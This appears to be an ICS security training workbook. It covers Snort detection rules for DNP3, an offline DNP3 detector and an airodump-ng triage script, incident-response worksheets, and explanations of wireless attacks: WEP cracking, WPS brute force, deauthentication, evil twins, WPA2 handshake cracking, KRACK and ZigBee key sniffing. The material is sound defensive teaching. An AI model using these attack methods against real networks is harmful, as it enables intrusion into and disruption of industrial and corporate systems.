In an ICS environment, Snort is beneficial to ensure expected commands are being sent to your
devices. Snort has ICS-specific preprocessors that enable you to easily identify functions from Modbus
and DNP3 on your network. The following links provide more information about the Modbus and DNP3
preprocessors: https://www.snort.org/faq/readme-modbus, https://www.snort.org/faq/readme-dnp3

In an ICS environment, network communication is relatively static as opposed to the more dynamic
nature of an IT environment. It is easier in ICS environments to define what IP addresses should be
communicating with the PLC or HMI than with a file server in the IT network. The communications are
well defined and do not change often, if ever. The static nature of the ICS environment makes it easier
to use Snort to:
• Detect non-legitimate communications
• Find whether unauthorized commands are being used
• Detect common suspicious activity on the network
Snort can read packet capture data. New rules can be written and run against existing data to test or
look for specific network traffic in previously captured data. In the next section, we will provide a quick
refresher on Snort preprocessors and rule writing materials from 301, and then take it a step further by
having you write your own rules.
Example ICS Snort rules

Snort rules for ICS operation


Check for write or delete operations not being sent by the master station: The following Snort rule can
be used to check this behavior, assuming the HMI IP address is 1.1.1.1 (the dnp3 preprocessor must be
enabled for the dnp3_func option to match):
alert tcp !1.1.1.1 any -> any any (msg:"Someone trying to write or delete to RTU"; dnp3_func:write,delete_file; sid:1;)
Check for “stop applications” commands not being sent by the master station: This is very dangerous if
sent broadcast to all RTUs:
alert tcp !1.1.1.1 any -> any any (msg:"Someone trying to stop the applications of an RTU device"; dnp3_func:stop_appl; sid:2;)
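The two rules above share one idea: a watched DNP3 application-layer function arriving from any
source other than the master. The script below is an added example, not part of the course materials
or of Snort: it applies that same check offline to captured DNP3/TCP payloads, which is useful for
testing a rule idea against a pcap before deploying it. It assumes the master station is 1.1.1.1 as in the
rules above; the other addresses and the frames are constructed for the example. The frames carry
placeholder CRC bytes and are not verified or reassembled the way Snort's dnp3 preprocessor does
them, so this reads the function code only from single-fragment requests.

```python
# DNP3 link-layer frames begin with the start bytes 0x05 0x64, followed by
# length (1), control (1), destination (2), source (2) and a CRC (2): 10 bytes.
# The user data then starts with the transport control byte, then the
# application control byte, then the application function code.
DNP3_START = b"\x05\x64"
FUNC_OFFSET = 12

MASTER_IPS = {"1.1.1.1"}   # the HMI/master station assumed by the rules above

# Function codes the rules above watch for: write (2), stop application (18),
# delete file (27).
WATCHED_FUNCS = {0x02: "write", 0x12: "stop_appl", 0x1B: "delete_file"}


def parse_dnp3_function(payload):
    """Return the application function code of a DNP3 frame, or None if the
    bytes do not look like a DNP3 frame that carries one."""
    if len(payload) < FUNC_OFFSET + 1 or payload[:2] != DNP3_START:
        return None
    return payload[FUNC_OFFSET]


def check_dnp3(records):
    """records: iterable of (src_ip, dst_ip, tcp_payload_bytes).

    Returns [(src, dst, function_name)] for each watched function that was
    not sent by a master station, mirroring the `!1.1.1.1` rule header.
    """
    alerts = []
    for src, dst, payload in records:
        func = parse_dnp3_function(payload)
        if func in WATCHED_FUNCS and src not in MASTER_IPS:
            alerts.append((src, dst, WATCHED_FUNCS[func]))
    return alerts


def frame(func, src_addr=1, dst_addr=10):
    """Build a minimal constructed DNP3 request frame for testing.

    Control 0xC4 = DIR and PRM set, unconfirmed user data. The CRC fields
    are zero placeholders, so these frames are for parser tests only.
    """
    user = bytes([0xC0, 0xC0, func])  # transport FIR|FIN, app FIR|FIN, function
    header = (DNP3_START + bytes([5 + len(user), 0xC4])
              + dst_addr.to_bytes(2, "little") + src_addr.to_bytes(2, "little"))
    return header + b"\x00\x00" + user + b"\x00\x00"


# Constructed records: (src_ip, dst_ip, payload); not from any course capture.
SAMPLE_RECORDS = [
    ("1.1.1.1", "10.0.0.5", frame(0x02)),   # master writing: expected
    ("10.0.0.9", "10.0.0.5", frame(0x02)),  # write from a non-master: alert
    ("10.0.0.9", "10.0.0.5", frame(0x01)),  # read from a non-master: not watched
    ("10.0.0.9", "10.0.0.5", frame(0x12)),  # stop application from a non-master: alert
]


if __name__ == "__main__":
    for src, dst, name in check_dnp3(SAMPLE_RECORDS):
        print("ALERT %s -> %s: %s not sent by master" % (src, dst, name))
```

To use it on real data, extract the TCP payloads of port 20000 traffic from a capture and feed them in
as records; any hit is a candidate for the Snort rules above and for a closer look at the sending host.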

What to monitor?
• ________________________
• ________________________
• ________________________
• ________________________
• ________________________
• ________________________
• ________________________
• ________________________
Network monitoring concerns
False positive - a legitimate (benign) network event that the monitoring solution alerted on as a potential
problem.
False negative - a malicious event that occurred but was not detected by the security architecture.
Unknown - an event that is not expected or recognized and cannot yet be classified as either; these need
investigation and usually a baselining or tuning decision.

Evaluation questions
 Is event data aggregated and correlated from multiple sources and sensors?
 Are system audit records reviewed and analyzed on a defined frequency, and are findings
reported to designated officials?
 Are the events to be audited adjusted within the system based on current threat information and
ongoing assessments of risk?
 Is the network monitored to detect potential cybersecurity events?
 Are evaluation results correlated to a framework (for example, NIST or CIS)?

Logging and monitoring exercise


Take any notes from the online activity: ____________________________________
____________________________________________________________________
____________________________________________________________________
________________________________________________________________________________

Wazuh demonstration
Take any notes from the online demonstration: ___________________________________________
_________________________________________________________________________________
_________________________________________________________________________________

Incident response
How is incident response supposed to work?

Incident response plan


1. ____________________________
2. ____________________________
3. ____________________________
4. ____________________________
5. ____________________________
6. ____________________________
7. ____________________________
8. ____________________________
9. ____________________________
“Developing an Industrial Control Systems Cybersecurity Incident Response Capability”, DHS, October
2009

Incident response questions


 Does the organization have written incident response procedures for the ICS Network that
include a definition of personnel roles for handling incidents?
 Does the organization maintain third-party contact information to be used in security incident
reporting?
 Does the organization ensure incident handling team personnel understand current threats and
risks, as well as their responsibilities, by conducting periodic incident scenario sessions?
 Are auditable events adequate to support after-the-fact investigations of security incidents?

Incident response exercise
Using your company, complete this Contact List. This will give you a head start when
you go back to work and start your own Analysis and Evaluation.

Network Monitoring and Incident Response


Evaluation Contact List
Company Name
________________________________________________________________________

1. Who is ultimately responsible for ICS Security in your company (Could be the
CSO/ISSO/CISO)? This is the person you must communicate with to evaluate your
OT environment.
_________________________________________________________________________
2. Are you responsible for network monitoring in your company? If not, who is? This
person (or persons) will know about the IDS sensors, logging, SIEM, tools, etc. used in
monitoring the OT network.
_________________________________________________________________________
3. Does a network map exist that shows the location of network IDS systems? If not,
who knows where the sensors are located? Where are the centralized log servers
located and which systems are logging to them?
________________________________________________________________________
4. Who is responsible for ensuring all OT Systems are sending logs to a central log
system or SIEM?
_________________________________________________________________________
5. Is there a separate Incident Response Plan for OT? Who is responsible for
maintaining and updating this plan?
_________________________________________________________________________
6. Who is responsible for conducting Incident Response exercises in your company?
_________________________________________________________________________

Return to the learning portal and continue with the next video.

Detection and monitoring recap
Cybersecurity plan mapping

Review

Learning Objective 5
Wireless in ICS environments
Many Wi-Fi-enabled devices exist, some of which we are not even aware of. As such, it is important to
take wireless devices into account in our evaluations. In this section, still working in Step 3, Determine
ICS Connectivity, we discuss wireless evaluation concepts, tools, and analysis.
Concepts, tools, and analysis
 High-level Wireless Communications Discussion
 IEEE 802.11 Protocols, a.k.a., Wi-Fi, and Threats
 IEEE 802.15 Protocols & Threats
 Packet Capture Tools
 Aircrack-ng, Kismet Wireless, and other tools
 Packet Analysis Tools
 Wireshark, Custom Scripts, and other tools
Radio spectrum
The image below depicts the frequency allocation map of the U.S. radio spectrum. Other countries publish
their own allocation maps and use parts of the spectrum differently from the U.S. The unlicensed 2.4 GHz
and 5 GHz bands that Wi-Fi and ZigBee use are, however, largely common worldwide, with regional
differences in the allowed channels and transmit power.

https://www.ntia.doc.gov/files/ntia/publications/2003-allochrt.pdf

Omni-directional antennas
When transmitting, an Omni-directional antenna radiates in the shape of a donut, meaning it sends radio
waves out in all horizontal directions (the signal is weakest directly above and below the antenna). Think
of it like a lightbulb: if you connect a lightbulb to a lamp in the middle of a room, the light emanates in
every direction. The same is true of an Omni-directional antenna, except that the radio waves also travel
through walls and glass and are received by radio devices in other rooms. With a high-gain antenna and a
clear line of sight, an Omni-directional Wi-Fi signal can reach as far as a mile.
Additionally:
 The closer you get to the transmitting antenna, the higher the received signal level.
 Most devices, including cell phones, Wi-Fi access points, laptops, etc., incorporate some form of
Omni-directional antenna.
 Omni-directional transmitters are not easily located, because the signal can appear to come from just
about anywhere.
Directional antennas
Unlike an Omni-directional antenna, a directional antenna concentrates its transmission in one direction.
Think of it like a flashlight: when you turn on a flashlight, you send light mainly in one direction. There is
some residual light behind the flashlight, but most of the light is in front. A directional antenna does
something similar. It transmits in one direction and receives best from that direction. It can still receive
from behind, but, as with a flashlight, the signal will be much weaker.
A directional antenna is very useful in locating a transmitter, because when it is pointed in a certain
direction it mainly receives signals from that direction. If you monitor the received power level, it rises
significantly as the antenna is pointed toward a transmitting device. This is very effective in giving you the
general direction of a transmitter.

Wi-Fi access points (AP)
As indicated, many devices have Wi-Fi built in. What we have found at locations around the country is
Wi-Fi access points built into industrial equipment where they were not expected, such as fuel processing
and delivery, building access controls, and package delivery systems. Each had either no encryption or
authentication at all, or very weak security. We recommend configuring any such access point to use
current encryption (WPA2 or WPA3) with a non-default password, and disabling the radio where the
wireless function is not needed.
As you well know, smart phones can be used as a Wi-Fi hotspot as well. Most of the time these are
secured. In rare cases, however, someone leaves their hotspot on and configured with no security. We still
see many smart phones with their hotspots turned on and unsecured, unbeknownst to the user. You may
see this in an airport or other areas, and it will show a name like "Bob's iPhone."
IoT devices are very prevalent and are used as subcomponents of systems such as appliances and
industrial equipment. One very popular module is the ESP8266, which contains a full Wi-Fi stack and can
act as a client or as an access point.
Of course, late model vehicles also contain Wi-Fi, Bluetooth, etc. Rental cars have the potential to pose a
threat of malware delivery if these facilities are used.
Wi-Fi spectrum
There are two spectrum bands on which Wi-Fi runs. The first, and most popular, is 2.4 GHz, with channel
centers from 2.412 GHz (channel 1) to 2.484 GHz (channel 14). There are 11 channels in the U.S. and up
to 14 in other countries (for example, Japan). The main channels in use in the U.S. are channels 1, 6, and
11, the only three 20 MHz channels that do not overlap one another. Other channels can be used, but
most people avoid them because they overlap with their neighbors, which causes interference and
congestion when two APs are in close proximity. There is even more congestion when two APs in close
proximity use the same channel. Most APs default to channel 6, so we find that most operators and users
plug in a wireless access point, configure the name, leave the channel alone, and cause congestion or
interference on their networks. Other channels can be used as long as they do not overlap.
For the 2.4 GHz band, the channel width is usually 20 MHz, or 40 MHz when channel bonding is used,
depending on the wireless AP manufacturer and the IEEE 802.11 protocol in use.

Source: https://i.stack.imgur.com/ymo5p.png

The second band Wi-Fi runs on is 5 GHz. In the U.S. it offers 24 non-overlapping channels at 20 MHz, or
11 at 40 MHz, and IEEE 802.11ac and later also bond channels to 80 MHz and 160 MHz for more
bandwidth and throughput. Basically, the AP uses a larger pipe (and possibly multiple antennas) to send
data on a wider channel.
Wi-Fi encryption types

 Open - No encryption.
 Wired Equivalent Privacy (WEP) - Developed in 1997 and proven to be weak and easily breakable. An
attacker can break it in a matter of minutes.
 Wi-Fi Protected Access (WPA) - Developed in 2003 as an interim replacement for WEP. It kept WEP's
RC4 cipher and added TKIP key mixing and integrity checks so it could run on WEP-era hardware; it is
now deprecated and should not be relied on.
 Wi-Fi Protected Access Version 2 (WPA2) - A complete rewrite (IEEE 802.11i, 2004) using AES-CCMP.
It worked for a number of years without problems, but it has known issues, such as the KRACK attack
covered later and offline guessing of weak pre-shared keys.
 Wi-Fi Protected Setup (WPS) - Uses an 8-digit PIN, or a push button, to bootstrap the passing of the
secret key between two parties (usually the AP and a connecting device such as a laptop).
 Wi-Fi Protected Access Version 3 (WPA3) - Next generation of WPA. Provides many updates to protect
users, such as stronger encryption, the SAE password exchange that resists offline dictionary attacks,
and mandatory Protected Management Frames.
 Wi-Fi CERTIFIED Enhanced Open - A Wi-Fi Alliance certification (Opportunistic Wireless Encryption)
that preserves the convenience open networks offer while reducing some of the risks, by encrypting each
client's traffic without authenticating anyone.

Beacons

An AP constantly broadcasts its own information so that clients are aware of its existence. This
broadcast is called a beacon; devices such as smart phones, laptops, and tablets use it to find the AP
and learn its capabilities. The beacon is typically transmitted about every 100 ms, depending on
configuration. It usually contains the network name (ESSID), the source MAC (BSSID), the destination
MAC (broadcast), supported rates, channel, encryption type, cipher type, authentication type, and some
other items.
Wi-Fi clients do not transmit beacons unless they are acting as a hotspot or AP. Instead, a client transmits
probe requests when it is trying to find an AP. When a client sees an AP from its list of previously joined
networks, it attempts to connect to it; otherwise, it lists the APs it can currently hear to the user.
Probe request

Usually, when a Wi-Fi client is not connected to an AP, it sends out probe requests in two ways:
 A general broadcast to all APs in RF range (destination FF:FF:FF:FF:FF:FF, with an empty SSID) to get
a response from any AP
 A directed probe request for a specific AP, by ESSID and/or by MAC address
In response to a broadcast probe, all APs reply with a Probe Response that looks very similar to a beacon.

A directed probe request is ignored by all APs whose name and/or MAC address do not match. The Probe
Response is addressed to the specific client that made the request, even though everyone else in range
can still see both the request and the response.
This means that, operating in monitor mode, an adversary can learn more about a client's (victim's)
whereabouts and about internal Wi-Fi APs not necessarily meant for public consumption.
Non-broadcasting APs that try to hide their SSID can have it revealed by clients performing probe
requests. The SSID is revealed whenever a client attempts to connect to the AP, because the protocol
always sends the SSID in clear text: the encryption key exchange has not occurred yet.
Capturing directed probe requests is quite helpful to an Evil Twin attacker, since they contain the SSID
and the MAC address of the intended AP. Both Aircrack-ng and Kismet can correlate captured SSID
names with the MAC addresses of APs attempting to hide, and so uncover hidden SSIDs.
It is a good idea to turn off Wi-Fi, Bluetooth, and location services on clients that do not need the
connectivity at that moment. It also saves battery power, since a client with Wi-Fi turned on is constantly
transmitting probe requests and processing probe responses.
Example airodump-ng capture

Source: question-defense.com
The above image shows data captured from the beacons broadcast by wireless APs. As you will notice,
the capture is currently on channel 6, and we have columns of data.
 The first column is the BSSID (Basic Service Set ID), the MAC address of the wireless access point
radio.
 The second column (PWR) is the received signal strength in dBm. The higher (less negative) the
number, the stronger the signal: for example, -47 dBm is stronger than -70 dBm, so that access point
is either more powerful or closer. The negative scale often throws people off into thinking the larger
absolute value is the bigger signal.
 The Beacons column is a count of the beacons received by this capture so far.
 The channel (CH) column tells you on which channel the AP is beaconing. As you can see, all the
beacons here are on channel 6.
 The MB column is the maximum data rate of the access point in megabits per second.
 The ENC column is the encryption type. As you can see, all the encryption types are represented in
this hypothetical example: WPA2, WPA with TKIP, WEP, and open (OPN).
 The ESSID column is the name of the access point. The name only shows up if the access point is
broadcasting it. Some access points are configured not to broadcast the name; the software we will
use, however, gathers the name from clients if the access point is not broadcasting it.
There are two sections to this screen. The upper section represents the access points in the area. The
lower section represents the clients in the area: there, the BSSID column is the access point and the
STATION column is the client's MAC address, followed by power, rate, lost packets, received packets,
etc. The final column (Probes) shows the names of the networks the client is looking for or connected to.
NOTE: APs that are not broadcasting the ESSID (Extended Service Set ID), i.e., the name, are not
shown in this screen. If there were an access point that was not broadcasting its name, it would show
up with all the other column data except the ESSID, which would display "<length: N>" for the
number of characters in the name, if discernible.
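The following is an added example, not course material: it reads the CSV file that airodump-ng writes (the same data as the screen above, with an access-point table, a blank line, then a station table), flags open, WEP and TKIP networks, and applies the probe-request correlation described earlier to put a name to a hidden SSID, using the rule that a probed name from a client associated with the hidden BSSID matches if its length equals the advertised ID-length. The file contents, BSSIDs, station MACs and network names are constructed.

```python
"""Triage an airodump-ng CSV capture: weak encryption, hidden SSIDs, probing clients.

Added example, not from the course material. airodump-ng -w <prefix> writes a
CSV with the access-point table, a blank line, then the station table; this
script reads that file and pulls out what an evaluator wants from a site survey.
SAMPLE_CSV is constructed: every BSSID, station MAC, name and timestamp is made up.
"""

SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2021-03-02 09:00:00, 2021-03-02 09:10:00,  6,  54, WPA2, CCMP, PSK, -47,      300,        0,   0.  0.  0.  0,   8, PlantOps,
00:11:22:33:44:02, 2021-03-02 09:00:01, 2021-03-02 09:10:00,  6,  54, WEP , WEP, , -70,      280,      150,   0.  0.  0.  0,   9, FuelPump1,
00:11:22:33:44:03, 2021-03-02 09:00:02, 2021-03-02 09:10:00, 11,  54, OPN , , , -62,      290,        0,   0.  0.  0.  0,   6, BadgeX,
00:11:22:33:44:04, 2021-03-02 09:00:03, 2021-03-02 09:10:00,  1,  54, WPA2, CCMP, PSK, -55,      310,        0,   0.  0.  0.  0,   7, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:00:00:01, 2021-03-02 09:01:00, 2021-03-02 09:09:00, -60,       40, 00:11:22:33:44:01, PlantOps
AA:BB:CC:00:00:02, 2021-03-02 09:02:00, 2021-03-02 09:09:30, -58,       12, (not associated) , OTmaint,CoffeeShop
AA:BB:CC:00:00:03, 2021-03-02 09:03:00, 2021-03-02 09:09:45, -64,       55, 00:11:22:33:44:04, OTmaint
"""


def _fields(line):
    return [f.strip() for f in line.split(",")]


def parse_airodump_csv(text):
    """Return (access points, stations) as lists of dicts. Probed ESSIDs are the
    trailing, comma-separated fields of a station row."""
    aps, stations, section = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):
            section = "ap"
            continue
        if line.startswith("Station MAC,"):
            section = "station"
            continue
        f = _fields(line)
        if section == "ap" and len(f) >= 14:
            aps.append({"bssid": f[0], "channel": int(f[3]), "privacy": f[5], "cipher": f[6],
                        "auth": f[7], "power": int(f[8]), "id_length": int(f[12]), "essid": f[13]})
        elif section == "station" and len(f) >= 6:
            stations.append({"mac": f[0], "power": int(f[3]), "bssid": f[5],
                             "probes": [p for p in f[6:] if p]})
    return aps, stations


def weak_aps(aps):
    """(bssid, name, reason) for every AP whose encryption an evaluator should flag."""
    findings = []
    for ap in aps:
        priv, ciph = ap["privacy"].upper(), ap["cipher"].upper()
        name = ap["essid"] or f"<hidden len={ap['id_length']}>"
        if "OPN" in priv:
            findings.append((ap["bssid"], name, "open network, no encryption"))
        elif "WEP" in priv:
            findings.append((ap["bssid"], name, "WEP, crackable in minutes"))
        elif "WPA3" not in priv and ("TKIP" in ciph or priv == "WPA"):
            findings.append((ap["bssid"], name, "WPA/TKIP, deprecated"))
    return findings


def hidden_ssid_candidates(aps, stations):
    """Map hidden BSSID -> names probed by its associated clients whose length
    matches the ID-length the AP advertises (the correlation described above)."""
    hidden = {ap["bssid"]: ap["id_length"] for ap in aps if not ap["essid"] and ap["id_length"] > 0}
    candidates = {}
    for st in stations:
        length = hidden.get(st["bssid"])
        if length is None:
            continue
        for name in st["probes"]:
            if len(name) == length:
                candidates.setdefault(st["bssid"], set()).add(name)
    return candidates


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for bssid, name, reason in weak_aps(aps):
        print(f"WEAK   {bssid} {name!r}: {reason}")
    for bssid, names in hidden_ssid_candidates(aps, stations).items():
        print(f"HIDDEN {bssid} probably {sorted(names)}")
```

Point the parser at the real <prefix>-01.csv from a survey; the station table also tells you which clients (plant laptops, phones) are probing for networks that have no business being on site.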
IEEE 802.11[x] support tools
Tools will capture data for:
 IEEE 802.11[b,g,n] @ 2.4 GHz
 IEEE 802.11[a,n,ac] @ 5 GHz
NOTE: Capturing IEEE 802.11ac traffic requires an adapter whose chipset supports monitor mode on
5 GHz at the wider channel widths; support has been growing but is still hardware dependent.

Wireless threats
There are several different ways in which an attacker can access your network. Let’s cover some of
those attack types.
 _______________________________________
 _______________________________________
 _______________________________________
 _______________________________________
 _______________________________________
 _______________________________________

WEP attack

If an access point is configured with WEP, it will literally be minutes before an attacker breaks into it.
WEP has been deprecated for many years.
If the Wi-Fi access point is busy, all the attacker has to do is sit and listen for encrypted frames and
collect their initialization vectors (IVs). After enough IVs have been collected, a cracking program uses
statistical analysis to derive the WEP key. Then all that is left to do is connect to the victim's Wi-Fi
access point.
If the access point is not busy and few people use it, the attacker can instead collect the right packets
and force the access point to produce the number of IVs required to crack the key.
The way to do this is to force an unsuspecting user to disconnect from the access point by sending a
de-authentication packet. The user's client re-associates with the access point, which generates ARP
packets; the attacker captures one and replays it to the access point over and over, and every reply
carries a fresh IV. This process can be automated so that it only takes a few minutes to collect enough
data. Once there is enough IV data, recovering the key takes literally seconds.

WPS attack

An AP that supports WPS advertises it in its beacons (a WPS information element), so an attacker can
find WPS-enabled APs simply by listening. Pressing the WPS button on the AP only opens a short
push-button window; the weak point is the 8-digit PIN method, which can be brute-forced online because
the PIN is validated in two halves and its last digit is a checksum. Disable WPS on access points that do
not need it.

Wi-Fi de-authentication DoS

A simple Denial-of-Service (DoS) attack. The attacker sends de-authentication packets to each Wi-Fi
client connected to, or trying to connect to, the AP. The de-authentication (deauth) packet forces the client
to disconnect from the AP and reauthenticate. The packet is spoofed to look as if it came from the AP but
is in fact from the attacker. Since the packets are sent continuously, the users cannot maintain a
connection to the AP, and the attacker can use the interruption to force reconnections (for handshake
capture) or to lure clients to an Evil Twin.
Simple devices, such as the Raspberry Pi and ESP8266, can be configured to spew deauth packets as
the MAC address of each client is learned. The packets can also be broadcast to all clients by NOT
specifying a client address when using aireplay-ng, making the attack even simpler to execute. The
problem for the attacker is that a broadcast deauth disconnects the attacker's own client as well.
Protected Management Frames (IEEE 802.11w), optional in WPA2 and mandatory in WPA3, authenticate
deauthentication and disassociation frames so that clients ignore spoofed ones; enabling PMF where both
the AP and the clients support it defeats this attack.

Evil twin (Man-in-the-Middle) attack

A Wi-Fi AP can be configured to look like one already in the network: same name, and the MAC address
can be duplicated to look like the real thing. The victim attempts to connect to what it believes is its
access point. Where authentication happens over the connection (an open network with a login portal, or
an enterprise network), the "Evil Twin" takes the victim's credentials, relays them to the intended access
point, and establishes a connection for itself as well as one for the victim. The victim thinks it has a
connection to the real network; in reality it is connected to the Evil Twin, which now sees every
connection element.
From that position the attacker can steal passwords, access corporate networks, capture documents,
launch other attacks, and a host of other things.
Another reason the victim connects to the Evil Twin rather than the intended access point is power level.
The Evil Twin is configured to broadcast at a higher power level, leading victims to choose the attacker's
access point because the client believes it is nearer, with a better signal.

WPA/WPA2 handshake attack

The WPA or WPA2 (pre-shared key) attack is very straightforward. All that is required is to capture the
4-way handshake that occurs when a client connects to the Wi-Fi access point.
If the attacker cannot capture the handshake just by listening, the attacker sends deauth packets to force
a client to disconnect and reconnect, a process that exposes the handshake.
Once the handshake is captured, the attacker can go away and run an offline dictionary or brute-force
attack against it at home, or wherever there are computing resources; nothing more needs to be sent to
the access point.
If the WPA passphrase is very weak, cracking it is a matter of seconds or minutes, especially if it is a
dictionary word or appears in a common password list. If the passphrase is long, random, and complex,
this attack becomes quite difficult and would require significant computing power.
Once the passphrase is cracked, it is just a matter of joining the access point and accessing resources
on that network. A long random passphrase, or WPA3 (whose SAE exchange does not expose a
guessable handshake), is the defense.

WPA2 Key Reinstallation AttaCK (KRACK)

This attack came out in 2017 and was a big surprise to the Wi-Fi community. We thought our
WPA2-configured Wi-Fi access points were very secure before this attack strategy was published. It is a
simple and straightforward attack, and it is surprising that it did not come out sooner. Again, it targets the
4-way handshake that installs the session (pairwise) key. An attacker positioned between client and AP
blocks and then replays message 3 of the handshake; the client responds by reinstalling the key it
already has, which resets the packet number (nonce) and replay counter used by the cipher. The attacker
does not learn or choose the key, but the nonce reuse lets the attacker decrypt and replay frames, and on
some implementations the reinstalled key was even all zeros. The WPA2 standard did not say that an
already-installed key must never be installed again; patched clients and access points now refuse to
reinstall a key that is already in use.
Most of the exposure is on the client side (the AP side matters mainly for 802.11r fast roaming). Many
manufacturers have supplied patches, for both commercial-grade and home equipment, but not all
devices have a patch, and many deployed devices will never receive one. Mitigations must be in place to
guard against attacks of this type, and an organization should measure its risk level and apply the
appropriate protections.

ZigBee attacks
IEEE 802.15 standards
 IEEE 802.15.1: WPAN / Bluetooth – No longer managed by IEEE; now managed by the Bluetooth
Special Interest Group.
 IEEE 802.15.2: Coexistence – Task Group to manage coexistence with other protocols in the
same frequency band.
 IEEE 802.15.3: High Rate WPAN – Wide band and millimeter wave technologies.
 IEEE 802.15.4: Low Rate WPAN – Home, office, and building automation technologies, such as
ZigBee and ISA100.
 Task Group 5: Mesh Networking – Task group to address mesh network architectures of this
family of standards.
 IEEE 802.15.6: Body Area Networks – Standards for medical or wearable networks worn on or
attached to the body.
 IEEE 802.15.7: Visible Light Communication – Optical transmission technology.
 IEEE P802.15.8: Peer Aware Communications – Infrastructure-less technology.
 IEEE P802.15.9: Key Management Protocol – Key security and handling.
 IEEE P802.15.10: Layer 2 Routing – Particularly in 802.15.4 networks.
Source: http://en.Wikipedia.org/wiki/IEEE_802.15

IEEE 802.15.4 protocol technologies


 6LoWPAN – IPv6 over Low Power Wireless Personal Area Networks.
 Thread – IPv6-based, low power mesh networking technology for IoT products, intended to be secure
and future-proof.
 ISA100.11a – Wireless Systems for Industrial Automation: Process Control and Related Applications.
Honeywell and others use this technology.
 MiWi – Proprietary wireless protocols designed by Microchip Technology that use small, low-power
digital radios based on the IEEE 802.15.4 standard for wireless personal area networks (WPANs).
 WirelessHART – Wireless sensor networking technology based on the Highway Addressable Remote
Transducer Protocol (HART). Basically, a wired protocol going over wireless.
 ZigBee – IEEE 802.15.4-based specification for a suite of high-level communication protocols used to
create personal area networks with small, low-power digital radios, such as for home automation,
medical device data collection, and other low-power, low-bandwidth needs, designed for small-scale
projects that need a wireless connection.

ZigBee roles

Trust Center – Authenticates devices joining the network and distributes keys. A ZigBee network is not
required to implement a Trust Center node, but using one enhances the confidentiality, integrity, and
availability of the ZigBee PAN.
Coordinator – A ZigBee PAN cannot exist without the Coordinator, which forms the network and connects
to all nodes in it, unless a router is bridging to another PAN. Each PAN must have one and only one
Coordinator.
Router – Relays messages from one set of ZigBee devices to another. It is also used to bridge PANs,
which is typically seen in a mesh network involving multiple PANs. Messages can be routed between
PANs, between Coordinators and End Devices, or between End Devices, depending on the implementer's
network design. Link quality (signal level) is used by the network, usually dynamically, to determine a
route between two nodes.
End Device – A reduced-function device as far as network functions go, but fully functional in working
with the connected equipment. These are the devices at the 'end' of the network that provide information
to the Coordinator or to other devices on the network.
ZigBee network topologies
The three network topologies of a ZigBee network are:
1. Star
2. Mesh
3. Cluster Tree
The most common is the Star Network, due to its simplicity to implement, especially in home automation
and office environments.
The Mesh Network topology uses routers to extend the reach of the network beyond the single hop of the
Star Network. Routers can communicate with anything on the network, so the reach and the number of
nodes are limited by the number of routers designed into the network. Routers communicate with other
routers, unlike in the Cluster Tree Network.
In the Cluster Tree Network, router nodes are only allowed to communicate with the Coordinator and
End Devices – not other routers, which is part of the basis for Mesh Networks. Cluster Trees allow for a
simplified traversal of the network over Mesh Networks, which may have numerous routes between two
nodes. On the other hand, a Mesh Network would allow an alternate path, if needed.
The Trust Center node is not shown, but the Coordinator typically plays the Trust Center role.

Source: http://ZigBee.pbworks.com/f/ZigBee+Topologies.png

ZigBee attacks
End Device Sabotage. A typical ZigBee end device runs on batteries in low power mode. In this mode
the ZigBee end device can run for years, operating only when need dictates. In this attack, a ZigBee
router or a ZigBee coordinator is impersonated, forcing the ZigBee end device to wake up more
often, draining the batteries and causing the system to fail ahead of schedule due to a lack of battery
power.
Network Key Sniffing. Many ZigBee networks are set up without encryption. A successful attack
would just be a matter of sniffing the network with Wireshark and extracting the network keys or the
PAN ID from whatever devices are communicating on the network, since all the devices share the
same key or PAN ID.
Replay Attack. Especially in an unencrypted network, this type of attack could be achieved by
recording the packets being transmitted and replaying them.

Again, with an open PAN (which means no encryption has been configured for the personal area
network), the network can be easily penetrated and new devices installed.
The maximum frame counter attack occurs when a rogue device starts sending frames within the
network and the maximum frame counter is exceeded. The device whose maximum frame count has
been exceeded will reject any new network frames, causing a denial-of-service condition. There is also a
second use of the frame count as a sequence ID, which in some cases can be predicted.

https://pdfs.semanticscholar.org/cf51/0927a408d9d4a09fd1465d652b574f39f92d.pdf
https://research.kudelskisecurity.com/2017/11/21/ZigBee-security-basics-part-3/

ZigBee key eavesdropping
 New end device joins the PAN
 Encryption Key distributed via wireless in cleartext
 Key captured by eavesdropper
When new nodes are added to a network, encryption keys are provisioned, or other settings are
set/changed over a wireless connection, an eavesdropper can capture packets containing the
encryption key – or, by statistical analysis, derive the key in a fashion similar to a WEP Wi-Fi attack.
The encryption key can then be used to provision a nefarious node.
ZigBee replay attack
 Unencrypted network
 Packets captured
 Packets replayed by attacker
In an unencrypted network, and in some ZigBee networks, packets can be captured and replayed.
Encryption is not on by default in many ZigBee products, as there is no provision in the standards to
do so. The mitigation is to provision over a wired connection, or to use a Trust Center, which will
perform authentication depending on the configuration of the network architecture.

RF capture tools
Wi-Fi monitoring hardware
Wi-Fi monitoring hardware is a small subset of all Wi-Fi hardware
devices available. Most of the hardware built into laptops will not go into
monitor mode, meaning an external dongle with a compatible chipset is
required. There are open-source drivers available that have been
modified to allow most Linux installations and a few Windows
installations. The majority of installations are Linux on a wide variety of
platforms, from Raspberry Pi to high-end laptops to portable units.
The most important thing to note is the chipset. There are a few compatible chipsets:
 Atheros
 Ralink
 Realtek
Source: https://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html
The images above show compatible devices widely known to work. The TP-Link WN722N Version 1 is
not the only version that works, but it works best and has a very low price point, although only in
2.4 GHz. The manufacturer changed the chipset in Version 2 and later, which no longer work with Linux.
Some example Wi-Fi hardware:
 TP-Link WN722N V1 only
 Alfa AWUS036NH
 Panda Wireless PAU09
Aircrack-ng suite of tools
As you can see, Aircrack-ng is a suite of 19 or so tools that perform various tasks, such as monitoring,
dumping, and cracking. We are only going to discuss the two tools shown in red: airmon-ng and
airodump-ng.
 airbase-ng
 aircrack-ng
 airdecap-ng
 airdecloak-ng
 airdriver-ng - REMOVED in 1.2 rc 1
 airdrop-ng
 aireplay-ng
 airgraph-ng
 airmon-ng
 airodump-ng
 airolib-ng
 airserv-ng
 airtun-ng
 besside-ng
 dcrack
 easside-ng
 packetforge-ng
